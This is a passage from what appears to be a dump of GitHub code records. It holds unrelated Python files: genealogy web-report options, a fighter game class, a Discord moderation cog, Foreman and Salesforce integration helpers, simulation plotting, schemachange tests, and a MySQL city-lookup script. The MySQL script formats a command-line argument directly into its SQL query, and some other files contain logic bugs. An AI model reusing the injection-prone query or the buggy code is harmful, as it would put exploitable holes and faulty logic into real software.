bkref_type)\n\n\t\tinc_gendex = BooleanOption(_('Include GENDEX file (/gendex.txt)'), False)\n\t\tinc_gendex.set_help(_('Whether to include a GENDEX file or not'))\n\t\taddopt(\"inc_gendex\", inc_gendex)\n\n\n\tdef __add_trees_options(self, menu):\n\t\tcategory_name = _(\"Trees\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tpage_defs = [\n\t\t\tPAGE_SVG_TREE,\n\t\t]\n\t\tfor page_def in page_defs:\n\t\t\tname = PAGES_NAMES[page_def][0]\n\t\t\ttitle = PAGES_NAMES[page_def][1]\n\t\t\tpage_name = StringOption(_(\"Title for the tree \\\"%(name)s\\\"\") % {\"name\": name}, title)\n\t\t\tpage_name.set_help(_(\"Name for the page that shows the tree \\\"%(name)s\\\"\") % {\"name\": name})\n\t\t\taddopt(\"page_name_%i\" % page_def, page_name)\n\n\t\tgraphgens = NumberOption(_(\"Maximum number of generations\"), 10, 3, 30)\n\t\tgraphgens.set_help(_(\"The maximum number of generations to include in the ancestor and descendant trees and graphs\"))\n\t\taddopt(\"graphgens\", graphgens)\n\n\t\tsvg_tree_type = EnumeratedListOption(_(\"SVG tree graph type\"), str(DEFAULT_SVG_TREE_TYPE))\n\t\tfor (i, opt) in enumerate(SVG_TREE_TYPES):\n\t\t\tsvg_tree_type.add_item(str(i), opt)\n\t\tsvg_tree_type.set_help(_(\"Choose the default SVG tree graph type\"))\n\t\taddopt(\"svg_tree_type\", svg_tree_type)\n\t\t\n\t\tsvg_tree_shape = EnumeratedListOption(_(\"SVG tree graph shape\"), str(DEFAULT_SVG_TREE_SHAPE))\n\t\tfor (i, opt) in enumerate(SVG_TREE_SHAPES):\n\t\t\tsvg_tree_shape.add_item(str(i), opt)\n\t\tsvg_tree_shape.set_help(_(\"Choose the default SVG tree graph shape\"))\n\t\taddopt(\"svg_tree_shape\", svg_tree_shape)\n\t\t\n\t\tsvg_tree_distrib_asc = EnumeratedListOption(_(\"SVG tree parents distribution\"), str(DEFAULT_SVG_TREE_DISTRIB))\n\t\tfor (i, opt) in enumerate(SVG_TREE_DISTRIB_ASC):\n\t\t\tsvg_tree_distrib_asc.add_item(str(i), opt)\n\t\tsvg_tree_distrib_asc.set_help(_(\"Choose the default SVG tree parents distribution (for fan charts only)\"))\n\t\taddopt(\"svg_tree_distrib_asc\", svg_tree_distrib_asc)\n\t\t\n\t\tsvg_tree_distrib_dsc = EnumeratedListOption(_(\"SVG tree children distribution\"), str(DEFAULT_SVG_TREE_DISTRIB))\n\t\tfor (i, opt) in enumerate(SVG_TREE_DISTRIB_DSC):\n\t\t\tsvg_tree_distrib_dsc.add_item(str(i), opt)\n\t\tsvg_tree_distrib_dsc.set_help(_(\"Choose the default SVG tree children distribution (for fan charts only)\"))\n\t\taddopt(\"svg_tree_distrib_dsc\", svg_tree_distrib_dsc)\n\t\t\n\t\tsvg_tree_background = EnumeratedListOption(_(\"Background\"), str(DEFAULT_SVG_TREE_BACKGROUND))\n\t\tfor (i, opt) in enumerate(SVG_TREE_BACKGROUNDS):\n\t\t\tsvg_tree_background.add_item(str(i), opt)\n\t\tsvg_tree_background.set_help(_(\"Choose the background color scheme for the persons in the SVG tree graph\"))\n\t\taddopt(\"svg_tree_background\", svg_tree_background)\n\n\t\tsvg_tree_color1 = ColorOption(_(\"Start gradient/Main color\"), \"#EF2929\")\n\t\taddopt(\"svg_tree_color1\", svg_tree_color1)\n\n\t\tsvg_tree_color2 = ColorOption(_(\"End gradient/2nd color\"), \"#3D37E9\")\n\t\taddopt(\"svg_tree_color2\", svg_tree_color2)\n\n\t\tself.__svg_tree_dup = BooleanOption(_(\"Show duplicates\"), True)\n\t\tself.__svg_tree_dup.set_help(_(\"Whether to use a special color for the persons that appear several times in the SVG tree\"))\n\t\tself.__svg_tree_dup.connect(\"value-changed\", self.__svg_tree_dup_changed)\n\t\taddopt(\"svg_tree_dup\", self.__svg_tree_dup)\n\t\t\n\t\tself.__svg_tree_color_dup = ColorOption(_(\"Color for duplicates\"), \"#888A85\")\n\t\taddopt(\"svg_tree_color_dup\", self.__svg_tree_color_dup)\n\n\n\tdef __add_pages_options(self, menu):\n\t\tcategory_name = _(\"Pages\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\theadernote = NoteOption(_('HTML user header'))\n\t\theadernote.set_help( _(\"A note to be used as the page header\"))\n\t\taddopt(\"headernote\", headernote)\n\n\t\tfooternote = NoteOption(_('HTML user footer'))\n\t\tfooternote.set_help( _(\"A note to be used as the page footer\"))\n\t\taddopt(\"footernote\", footernote)\n\n\t\tpage_defs = [\n\t\t\tPAGE_PERSON,\n\t\t\tPAGE_SURNAMES,\n\t\t\tPAGE_PERSON_INDEX,\n\t\t\tPAGE_FAMILY_INDEX,\n\t\t\tPAGE_SOURCE_INDEX,\n\t\t\tPAGE_MEDIA_INDEX,\n\t\t\tPAGE_PLACE_INDEX,\n\t\t\tPAGE_ADDRESS_INDEX,\n\t\t\tPAGE_REPOSITORY_INDEX,\n\t\t]\n\t\tfor page_def in page_defs:\n\t\t\tname = PAGES_NAMES[page_def][0]\n\t\t\ttitle = PAGES_NAMES[page_def][1]\n\t\t\tpage_name = StringOption(_(\"Title for the page \\\"%(name)s\\\"\") % {\"name\": name}, title)\n\t\t\tpage_name.set_help(_(\"Name for the page \\\"%(name)s\\\"\") % {\"name\": name})\n\t\t\taddopt(\"page_name_%i\" % page_def, page_name)\n\n\n\tdef __add_custom_pages_options(self, menu):\n\t\tcategory_name = _(\"Custom pages\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tfor i in range(NB_CUSTOM_PAGES):\n\t\t\tpage_def = PAGE_CUSTOM + i\n\t\t\tpage_name = StringOption(_(\"Title for the custom page %(index)i\") % {\"index\": i + 1}, _(\"Custom page %(index)i\") % {\"index\": i + 1})\n\t\t\tpage_name.set_help(_(\"Name for the custom page %(index)i\") % {\"index\": i + 1})\n\t\t\taddopt(\"page_name_%i\" % page_def, page_name)\n\n\t\t\tcustom_note = NoteOption(_(\"Note for custom page %(index)i\") % {\"index\": i + 1})\n\t\t\tcustom_note.set_help(_(\"A note to be used for the custom page content.\\n\") + self.note_help)\n\t\t\taddopt(\"custom_note_%i\" % i, custom_note)\n\n\t\t\tcustom_menu = BooleanOption(_(\"Menu for the custom page %(index)i\") % {\"index\": i + 1}, True)\n\t\t\tcustom_menu.set_help(_(\"Whether to print a menu for the custom page\"))\n\t\t\taddopt(\"custom_menu_%i\" % i, custom_menu)\n\n\n\tdef __add_select_pages_options(self, menu):\n\t\tcategory_name = _(\"Pages selection\")\n\t\taddopt = partial(menu.add_option, category_name)\n\n\t\tself.__pages_number = NumberOption(_(\"Number of pages\"), 11, 1, NB_TOTAL_PAGES_MAX)\n\t\tself.__pages_number.set_help(_(\"Number pages in the web site.\"))\n\t\taddopt(\"pages_number\", self.__pages_number)\n\t\tself.__pages_number.connect(\"value-changed\", self.__pages_contents_changed)\n\n\t\tpage_defs = [\n\t\t\tPAGE_CUSTOM,\n\t\t\tPAGE_SURNAMES,\n\t\t\tPAGE_PERSON,\n\t\t\tPAGE_PERSON_INDEX,\n\t\t\tPAGE_FAMILY_INDEX,\n\t\t\tPAGE_SOURCE_INDEX,\n\t\t\tPAGE_MEDIA_INDEX,\n\t\t\tPAGE_PLACE_INDEX,\n\t\t\tPAGE_ADDRESS_INDEX,\n\t\t\tPAGE_REPOSITORY_INDEX,\n\t\t\tPAGE_SVG_TREE,\n\t\t] + [PAGE_CUSTOM + i for i in range (1, NB_CUSTOM_PAGES)\n\t\t] + [PAGE_CUSTOM] * NB_TOTAL_PAGES_MAX\n\n\t\tself.__page_content = []\n\t\tfor i in range(NB_TOTAL_PAGES_MAX):\n\t\t\tpage_def = page_defs[i]\n\t\t\tpage_content = EnumeratedListOption(_(\"Contents of page %(index)i\") % {\"index\": i + 1}, page_def)\n\t\t\tfor (j, pname) in enumerate(PAGES_NAMES):\n\t\t\t\tpage_content.add_item(j, pname[0])\n\t\t\tpage_content.set_help(_(\"Contents of the page\"))\n\t\t\taddopt(\"page_content_%i\" % i, page_content)\n\t\t\tself.__page_content.append(page_content)\n\t\t\tself.__page_content[i].connect(\"value-changed\", self.__pages_contents_changed)\n\n\t\tself.__pages_contents_changed()\n\n\n\tdef __archive_changed(self):\n\t\t\"\"\"\n\t\tDisable the archive file when archive is disabled \n\t\t\"\"\"\n\t\tenable = self.__archive.get_value()\n\t\tself.__archive_file.set_available(enable)\n\n\tdef __pid_changed(self):\n\t\t\"\"\"\n\t\tUpdate the filter list based on the selected person\n\t\t\"\"\"\n\t\tgid = self.__pid.get_value()\n\t\tperson = self.__db.get_person_from_gramps_id(gid)\n\t\tfilter_list = report_utils.get_person_filters(person, False)\n\t\tself.__filter.set_filters(filter_list)\n\n\tdef __filter_changed(self):\n\t\t\"\"\"\n\t\tHandle filter change. If the filter is not specific to a person,\n\t\tdisable the person option\n\t\t\"\"\"\n\t\tfilter_value = self.__filter.get_value()\n\t\tif filter_value in [1, 2, 3, 4]:\n\t\t\t# Filters 1, 2, 3 and 4 rely on the center person\n\t\t\tself.__pid.set_available(True)\n\t\telse:\n\t\t\t# The rest don't\n\t\t\tself.__pid.set_available(False)\n\n\tdef __living_changed(self):\n\t\t\"\"\"\n\t\tHandle a change in the living option\n\t\t\"\"\"\n\t\tif self.__living.get_value() == INCLUDE_LIVING_VALUE:\n\t\t\tself.__yearsafterdeath.set_available(False)\n\t\telse:\n\t\t\tself.__yearsafterdeath.set_available(True)\n\n\tdef __pages_contents_changed(self):\n\t\tnb = self.__pages_number.get_value()\n\t\tfor i in range(NB_TOTAL_PAGES_MAX):\n\t\t\tif (i < nb):\n\t\t\t\tself.__page_content[i].set_available(True)\n\t\t\telse:\n\t\t\t\tself.__page_content[i].set_available(False)\n\n\tdef __placemap_options_changed(self):\n\t\t\"\"\"\n\t\tHandles the changing nature of the place map Options\n\t\t\"\"\"\n\t\t# get values for all Place Map Options tab...\n\t\tplace_active = self.__inc_places.get_value()\n\t\tplace_map_active = self.__placemappages.get_value()\n\t\tfamily_active = self.__familymappages.get_value()\n\t\tmapservice_opts = self.__mapservice.get_value()\n\t\t# google_opts = self.__googleopts.get_value()\n\n\t\tif (place_active):\n\t\t\tself.__placemappages.set_available(True)\n\t\t\tself.__familymappages.set_available(True)\n\t\t\tself.__mapservice.set_available(True)\n\t\t\t# self.__googleopts.set_available(True)\n\n\t\tif (place_map_active or family_active):\n\t\t\tself.__mapservice.set_available(True)\n\t\telse:\n\t\t\tself.__mapservice.set_available(False)\n\n\t\t# if (family_active and mapservice_opts == \"Google\"):\n\t\t\t# self.__googleopts.set_available(True)\n\t\t# else:\n\t\t\t# self.__googleopts.set_available(False)\n\n\t\tif (not place_active):\n\t\t\tself.__placemappages.set_available(False)\n\t\t\tself.__familymappages.set_available(False)\n\t\t\tself.__mapservice.set_available(False)\n\t\t\t# self.__googleopts.set_available(False)\n\n\tdef __svg_tree_dup_changed(self):\n\t\t\"\"\"\n\t\tHandles the duplicate color enable\n\t\t\"\"\"\n\t\tenable = self.__svg_tree_dup.get_value()\n\t\tself.__svg_tree_color_dup.set_available(enable)\n","repo_name":"daleathan/gramps-addons-code-svn","sub_path":"contrib/DynamicWeb/dynamicweb.py","file_name":"dynamicweb.py","file_ext":"py","file_size_in_byte":148390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2127931495","text":"from person import Person\nfrom fight import Fight\n\nclass Fighter(Person):\n\n def __init__(self, name: str, age: int = 0, wealth: int = 0, skills: dict = None) -> None:\n \"\"\"\n Constructor for the Fighter class.\n\n :type skills: object\n :param name: str\n :param age: int\n :param wealth: int\n \"\"\"\n\n Person.__init__(self, name, age, wealth)\n self.__skills = None\n self.challenged = []\n\n if age < 18:\n print(name + \" cannot be a fighter.\")\n return\n\n self.__skills = {\"spear\": 0,\n \"unarmed_combat\": 0,\n \"mace\": 0,\n \"broadsword\": 0}\n\n if skills:\n self.__skills = skills\n if self.__skills[\"spear\"] > 10 or self.__skills[\"spear\"] < 0:\n print(\"The skill level for spear is invalid.\")\n\n if self.__skills[\"unarmed_combat\"] > 10 or self.__skills[\"unarmed_combat\"] < 0:\n print(\"The skill level for unarmed_combat is invalid.\")\n\n if self.__skills[\"mace\"] > 10 or self.__skills[\"mace\"] < 0:\n print(\"The skill level for mace is invalid.\")\n\n if self.__skills[\"broadsword\"] > 10 or self.__skills[\"broadsword\"] < 0:\n print(\"The skill level for broadsword is invalid.\")\n\n self.level = 2\n\n\n @property\n def getSkills(self) -> dict:\n \"\"\"\n Returns the skills of the fighter.\n\n :return: __skills: dict\n \"\"\"\n if self.age > 18:\n return self.__skills\n\n else:\n return {}\n\n def setSkills(self, newSkills: dict) -> None:\n \"\"\"\n Sets the skills to these new skills\n\n :param newSkills: dict\n :return: None\n \"\"\"\n\n self.__skills = newSkills\n\n def challenge(self, fighter2: object, skill: str) -> None:\n \"\"\"\n Challenges another fighter.\n\n :param fighter2: object\n :param skill: str\n :return: None\n \"\"\"\n # A fighter cannot fight themselves\n\n if not self.isEqual(fighter2):\n\n if not self.getSkills and not isinstance(fighter2, Fighter):\n print(self.getName + \" and \" + fighter2.getName + \" both are not fighters and hence cannot fight.\")\n\n elif not self.getSkills:\n print(self.getName + \" is not a fighter.\")\n return\n\n elif not isinstance(fighter2, Fighter):\n print(fighter2.getName + \" is not a fighter.\")\n return\n\n elif not fighter2.getSkills:\n print(fighter2.getName + \" is not a fighter.\")\n return\n\n # If they are both fighters:\n\n elif self.getSkills and fighter2.getSkills:\n\n # If the wealth of both the fighters is more than 0\n\n if self.getWealth <= 0:\n print(self.getName + \" has no wealth to fight.\")\n return None\n\n if fighter2.getWealth <= 0:\n print(fighter2.getName + \" has no wealth to fight.\")\n return None\n\n # If the skill they are fighting with does not exist\n\n if skill not in self.getSkills or skill not in fighter2.getSkills:\n print(skill + \" is not a valid skill for the fighter\")\n return None\n\n # If the skill they are using is over 0 then they fight.\n\n duel = Fight(self, fighter2, skill)\n winner = duel.winner()\n\n else:\n print(\"A fighter cannot fight themselves!\")\n return None\n\n def withdraw(self, withdrawFighter: str) -> None:\n \"\"\"\n Withdraws the fighter's name from the list\n\n :param withdrawFighter: str\n :return: None\n \"\"\"\n if self.getSkills and withdrawFighter.getSkills:\n\n pos = -1\n\n for x in range(0, len(self.challenged)):\n if withdrawFighter == self.challenged[x].getFighter1 or withdrawFighter == self.challenged[x].getFighter1:\n pos = x\n else:\n pass\n\n if x > -1:\n self.challenged.remove(x)\n\n else:\n print(self.getName + \" has not challenged \" + withdrawFighter.getName)\n\n else:\n print(self.getName + \" does not have any challenges since it is not a fighter.\")\n\n def __str__(self) -> str:\n \"\"\"\n Returns the state of the Fighter.\n\n :return: str\n \"\"\"\n if self.getSkills:\n return Person.__str__(self) + \" \" + self.getName + \"'s skills are: \\n\\tSpear: \" + str(\n self.getSkills[\"spear\"]) \\\n + \"\\n\\tUnarmed Combat: \" + str(self.getSkills[\"unarmed_combat\"]) + \"\\n\\tMace: \" + str(\n self.getSkills[\"mace\"]) \\\n + \"\\n\\tBroadsword: \" + str(self.getSkills[\"broadsword\"])\n\n else:\n return Person.__str__(self)\n","repo_name":"Avik9/Battle-Time","sub_path":"fighter.py","file_name":"fighter.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20581016909","text":"import asyncio\r\n\r\nimport discord\r\nfrom discord import client\r\nfrom discord.ext import commands\r\n\r\n\r\n\r\n\r\nclass admin(commands.Cog):\r\n\r\n def __init__(self, client):\r\n self.client = client\r\n\r\n\r\n @commands.command()\r\n @commands.has_permissions(ban_members=True)\r\n async def kick(self, ctx, member: discord.Member, *, reason=None):\r\n await ctx.message.delete(delay=0)\r\n await member.send(f\"You was kicked from server\")\r\n await ctx.send(f\"Member {member.mention} was kicked from this server!\")\r\n await member.kick(reason=reason)\r\n\r\n @commands.command()\r\n @commands.has_permissions(ban_members=True)\r\n async def ban(self, ctx, member: discord.Member, *, reason=None):\r\n await ctx.send(f\"Member {member.mention} was banned on this server\")\r\n await member.ban(reason=reason)\r\n await ctx.message.delete(delay=0)\r\n\r\n @commands.command()\r\n @commands.has_permissions(ban_members=True)\r\n async def unban(self, ctx, user_id: int):\r\n user = await client.fetch_user(user_id)\r\n await ctx.guild.unban(user)\r\n await ctx.message.delete(delay=0)\r\n\r\n @commands.command()\r\n @commands.has_permissions(ban_members=True)\r\n async def ping(self, ctx):\r\n await ctx.send(\"pong!\")\r\n\r\n\r\n\r\n\r\nasync def setup(client):\r\n await client.add_cog(admin(client))","repo_name":"nkplka/discord","sub_path":"cogs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12073523384","text":"#!/usr/bin/env python\n#######\n# To allow this module to be imported by other triggers\n# execute the commands below:\n# $ mkdir -p /usr/share/foreman-community/hooks\n# $ touch /usr/share/foreman-community/hooks/__init__.py\n# $ cp functions.py /usr/share/foreman-community/hooks/\n########\nimport json\nimport sys\nimport tempfile\n\nHOOK_TEMP_DIR = \"/usr/share/foreman/tmp\"\n\n# HOOK_EVENT = update, create, before_destroy etc.\n# HOOK_OBJECT = to_s representation of the object, e.g. host's fqdn\nHOOK_EVENT, HOOK_OBJECT = (sys.argv[1], sys.argv[2])\n\n\ndef get_json_hook():\n '''\n Create JSON object to be imported by hook/trigger\n Saves the data received via stdin to file.\n It does not require to save to a file, but it may be useful\n to troubleshooting.\n '''\n\n with tempfile.NamedTemporaryFile(\n dir=HOOK_TEMP_DIR,\n # set to False for troubleshooting\n delete=True,\n prefix=\"foreman_hooks.\") as hook:\n\n json_hook = sys.stdin.read()\n hook.file.write(json_hook)\n hook.file.flush()\n return json.loads(json_hook)\n","repo_name":"theforeman/foreman_hooks","sub_path":"examples/python/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"67"} +{"seq_id":"40283674361","text":"from itertools import islice\nfrom types import SimpleNamespace\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport numpy as np\nimport pickle\n\nclass Measurement:\n def __init__(self, params):\n self.params = params\n self.x = []\n self.w = []\n self.v = []\n self.noise = []\n self.LQG = []\n\n if params.scheme in ['noisy_lloyd_max', 'separate']:\n # Quantization index translated into bits\n self.bits = []\n # Entire history believed by the decoder (at each step)\n self.decoded_bits_history = []\n self.correctly_decoded = []\n\n def record(self, sim):\n self.x.append(sim.plant.x)\n self.w.append(sim.plant.w)\n self.v.append(sim.plant.v)\n self.noise.append(sim.channel.last_noise)\n self.LQG.append(sim.LQG.evaluate(sim.t))\n self.channel_average_power = sim.channel.average_power()\n\n if hasattr(self, 'bits'):\n self.bits = sim.encoder.get_bits_history()\n self.decoded_bits_history.append(list(\n sim.decoder.stack_decoder.first_nodes[-1].input_history()))\n self.correctly_decoded.append(\n all((word == history_word).all()\n for word, history_word in \\\n zip(self.bits, self.decoded_bits_history[-1])))\n print(\"Correctly decoded: {}\".format(self.correctly_decoded[-1]))\n\n def save(self, filename):\n with open(filename, 'wb') as f:\n pickle.dump(self, f)\n\n @staticmethod\n def load(filename):\n with open(filename, 'rb') as f:\n measurement = pickle.load(f)\n assert isinstance(measurement, Measurement)\n return measurement\n\n @staticmethod\n def average(measurements):\n new = Measurement(measurements[0].params)\n\n def average_sequence(sequences):\n sequences = [np.array(sequence).flatten() for sequence in sequences]\n slices = list(zip(*sequences))\n return np.array(list(map(np.mean, slices)))\n\n new.x = average_sequence(m.x for m in measurements)\n new.w = average_sequence(m.w for m in measurements)\n new.v = average_sequence(m.v for m in measurements)\n new.noise = average_sequence(m.noise for m in measurements)\n new.LQG = average_sequence(m.LQG for m in measurements)\n\n return new\n\n def get_noise_record(self):\n noise = SimpleNamespace()\n\n noise.x1 = self.x[0]\n noise.w_sequence = self.w[:]\n noise.v_sequence = self.v[:]\n noise.n_sequence = list(np.array(self.noise).flatten())\n\n return noise\n\n\n def plot(self, label=None):\n self.plot_setup()\n self.plot_LQG(label=label)\n self.plot_bounds()\n if hasattr(self, 'correctly_decoded'):\n self.plot_correctly_decoded()\n plt.legend()\n\n def plot_setup(self, label=\"Time [steps]\"):\n plt.xlabel(label)\n plt.grid()\n\n def plot_x(self):\n plt.plot(list(range(len(self.x))), self.x)\n plt.ylabel(\"Plant state\")\n\n def plot_LQG(self, label=None, *args, **kwargs):\n plt.plot(list(range(len(self.LQG))), 10 * np.log10(self.LQG),\n label=label, *args, **kwargs)\n plt.ylabel(r\"$\\bar{J}_t$ [dB]\")\n\n def plot_bounds(self, lower_label=\"Theoretical average lower bound\",\n upper_label=\"Theoretical prediction\",\n lower_args=['--'], lower_kwargs={},\n upper_args=['--'], upper_kwargs={}):\n params = self.params\n\n # Upper bound\n if params.analog and hasattr(params, 'SDR0'):\n plt.plot((1, len(self.LQG)),\n 10 * np.log10(params.LQR_inf_upper_bound()) * np.ones(2),\n *upper_args, label=upper_label, **upper_kwargs)\n\n # Lower bound\n if params.analog:\n plt.plot((1, len(self.LQG)),\n 10 * np.log10(params.LQR_inf_lower_bound()) * np.ones(2),\n *lower_args, label=lower_label, **lower_kwargs)\n\n def plot_correctly_decoded(self, y=0):\n RECTANGLE_HEIGHT = 0.8\n\n # Find intervals of consecutive Trues\n intervals = []\n start = None\n for (t, good) in enumerate(self.correctly_decoded, 1):\n if not start and not good:\n start = t\n elif start and (good or t == len(self.correctly_decoded)):\n intervals.append((start, t))\n start = None\n\n for i, (start, stop) in enumerate(intervals):\n print(\"({}, {})\".format(start, stop))\n plt.gca().add_patch(\n patches.Rectangle(\n (start, y - RECTANGLE_HEIGHT/2),\n stop - start,\n RECTANGLE_HEIGHT,\n label=\"Decoding errors\" if i == 0 else None,\n color='purple'\n )\n )\n","repo_name":"eliasrg/SURF2017","sub_path":"code/measurements.py","file_name":"measurements.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"72229322132","text":"from slack_ttt.base_logic_source import BaseLogicSource\nfrom slack_ttt.response_message import ResponseMessageBuilder as RMB\nfrom simple_salesforce import Salesforce\nfrom settings import (\n SFDC_USERNAME,\n SFDC_PASSWORD,\n SFDC_TOKEN\n )\n\nclass SalesforceLogicSource(BaseLogicSource):\n\n def initialize(self, params):\n self.sfdc = Salesforce(username=SFDC_USERNAME,\n password=SFDC_PASSWORD,\n security_token=SFDC_TOKEN)\n\n self.channel_id = params['channel_id'][0]\n self.requester = '@' + params['user_name'][0]\n self.command = None\n if 'text' in params:\n self.command = params['text'][0]\n\n def __sfdc_rest_call(self, resource):\n return self.sfdc.apexecute('handleTTTCommand',\n method='POST',\n data={'resource': resource,\n 'channelId': self.channel_id,\n 'requestor':self.requester,\n 'command': self.command\n })\n\n def __generate_response(self, response_map):\n print('*** RESPONSE: ',response_map);\n game_response_type = response_map['game_response_type']\n values = response_map['values'].split(',')\n slack_response_type = None\n if \"slack_response_type\" in response_map:\n slack_response_type = response_map[\"slack_response_type\"]\n else:\n slack_response_type = 'Ephemeral'\n\n response = None\n if 'response' in response_map:\n response = response_map['response']\n\n return RMB.respond(None,\n game_response_type=game_response_type,\n values=values,\n slack_response_type=slack_response_type,\n response=response)\n\n\n\n def new_game(self):\n response = self.__sfdc_rest_call('/ttt')\n return self.__generate_response(response['body'])\n\n\n def game_help(self):\n super().game_help()\n \"\"\"Help handler which provides information about the game and how to play it.\n\n :return:\n \"\"\"\n return RMB.respond(None,\n game_response_type='help_text',\n values=[])\n\n def accept_game(self):\n response = self.__sfdc_rest_call('/ttt-accept')\n return self.__generate_response(response['body'])\n\n def decline_game(self):\n response = self.__sfdc_rest_call('/ttt-decline')\n return self.__generate_response(response['body'])\n\n def display_board(self):\n response = self.__sfdc_rest_call('/ttt-board')\n return self.__generate_response(response['body'])\n\n def play_move(self):\n response = self.__sfdc_rest_call('/ttt-move')\n return self.__generate_response(response['body'])\n\n def end_game(self):\n response = self.__sfdc_rest_call('/ttt-end')\n return self.__generate_response(response['body'])","repo_name":"dineshrajpurohit/slack_ttt","sub_path":"slack_ttt/salesforce/salesforce_logic.py","file_name":"salesforce_logic.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8812218353","text":"import json\nimport os\n\nimport pytest\nfrom jinja2 import DictLoader\nfrom schemachange.cli import JinjaTemplateProcessor\n\n\ndef test_from_environ_not_set():\n processor = JinjaTemplateProcessor(\"\", None)\n\n # overide the default loader\n templates = {\"test.sql\": \"some text {{ env_var('MYVAR') }}\"}\n processor.override_loader(DictLoader(templates))\n\n with pytest.raises(ValueError) as e:\n context = processor.render(\"test.sql\", None, True)\n\n assert str(e.value) == \"Could not find environmental variable MYVAR and no default value was provided\"\n\n\ndef test_from_environ_set():\n processor = JinjaTemplateProcessor(\"\", None)\n\n # set MYVAR env variable\n os.environ[\"MYVAR\"] = \"myvar_from_environment\"\n\n # overide the default loader\n templates = {\"test.sql\": \"some text {{ env_var('MYVAR') }}\"}\n processor.override_loader(DictLoader(templates))\n\n context = processor.render(\"test.sql\", None, True)\n\n # unset MYVAR env variable\n del os.environ[\"MYVAR\"]\n\n assert context == \"some text myvar_from_environment\"\n\n\ndef test_from_environ_not_set_default():\n processor = JinjaTemplateProcessor(\"\", None)\n\n # overide the default loader\n templates = {\"test.sql\": \"some text {{ env_var('MYVAR', 'myvar_default') }}\"}\n processor.override_loader(DictLoader(templates))\n\n context = processor.render(\"test.sql\", None, True)\n\n assert context == \"some text myvar_default\"\n","repo_name":"Snowflake-Labs/schemachange","sub_path":"tests/test_jinja_env_var_template.py","file_name":"test_jinja_env_var_template.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":407,"dataset":"github-code","pt":"67"} +{"seq_id":"13679918612","text":"#!/usr/bin/python3\n'''Modules to be imported'''\nimport MySQLdb\nimport sys\n\n\ndef main(args):\n '''main function'''\n\n # check if passedargs are as needed\n if (len(args) != 5):\n print(\"checknumber of args\")\n sys.exit(1)\n\n # create a database connection\n db_connection = MySQLdb.connect(host=\"localhost\",\n port=3306,\n user=args[1],\n passwd=args[2],\n db=args[3])\n\n # create a cursor\n cur = db_connection.cursor()\n\n # sql query\n query = \"SELECT cities.name FROM cities JOIN states ON\\\n cities.state_id = states.id WHERE states.name = '{}' ORDER BY cities.id ASC\"\n\n formatted = query.format(args[4])\n\n # execute the query\n cur.execute(formatted)\n\n # loop todisplay results\n print(\", \".join(row[0] for row in cur.fetchall()))\n\n # close connections\n cur.close()\n db_connection.close()\n\n\n# Hey, I won't run when I'mimported\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"LionMara/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15280369221","text":"import textwrap\nfrom django.db.models import Max\n\nfrom src.models import *\n\n\ndef parse_history():\n hist_list = []\n hist = HistoryItem.objects.all()\n for h in hist:\n lines = h.content\n lines = [line for line in lines.split('\\n') if line.strip()]\n ls_1_flag = 0\n ls_2_flag = 0\n for i in xrange(len(lines)):\n lines[i] = lines[i].rstrip()\n if lines[i][0] == \"#\":\n lines[i] = \"\" + lines[i][1:] + \"
    \"\n elif lines[i][0] != '-':\n if lines[i][0] == \"!\":\n lines[i] = \"by \" + lines[i][1:] + \"

    \"\n else:\n lines[i] = \"

    \" + lines[i] + \"

      \"\n\n else:\n if lines[i][:2] != '-\\\\':\n lines[i] = \"
    • \" + lines[i][1:] + \"
    • \"\n if ls_1_flag:\n lines[i] = \"

    \" + lines[i]\n ls_1_flag = i\n\n else:\n lines[i] = \"
  • \" + lines[i][2:] + \"
  • \"\n if ls_2_flag < ls_1_flag:\n lines[i] = \"

      \" + lines[i]\n ls_2_flag = i\n lines.append(\"



    \")\n date_string = h.date.strftime(\"%b %d, %Y (%a)\")\n lines.insert(0, \"%s
    \" % date_string)\n hist_list.insert(0, ''.join(lines))\n\n return hist_list\n\n\ndef get_rmdb_stats():\n rmdb_ids = [d.values()[0] for d in RMDBEntry.objects.values('rmdb_id').distinct()]\n N_all = 0\n N_RNA = 0\n # N_RNA = ConstructSection.objects.values('name').distinct().count()\n N_puzzle = 0\n N_eterna = 0\n N_constructs = 0\n N_datapoints = 0\n for rmdb_id in rmdb_ids:\n entries = RMDBEntry.objects.filter(rmdb_id=rmdb_id).order_by('-version')\n if len(entries) >= 0:\n N_all += 1\n N_RNA += len(entries)\n\n if 'RNAPZ' in rmdb_id:\n N_puzzle += 1\n if 'ETERNA' in rmdb_id:\n N_eterna += 1\n e = entries[0]\n N_datapoints += e.data_count\n N_constructs += e.construct_count\n return {'N_all': N_all, 'N_RNA': N_RNA, 'N_puzzle': N_puzzle, 'N_eterna': N_eterna, 'N_constructs': N_constructs, 'N_datapoints': N_datapoints}\n\n\ndef browse_json_list(names_d):\n constructs = []\n for c in names_d:\n entries = RMDBEntry.objects.filter(constructsection__name=c['name']).filter(status='PUB').order_by('rmdb_id', '-version')\n entry_ids = []\n (SS_entries, TT_entries, MA_entries, MM_entries, MR_entries) = ([], [], [], [], [])\n\n for e in entries:\n if e.rmdb_id not in entry_ids:\n entry_ids.append(e.rmdb_id)\n comment = e.comments.split()\n for i, m in 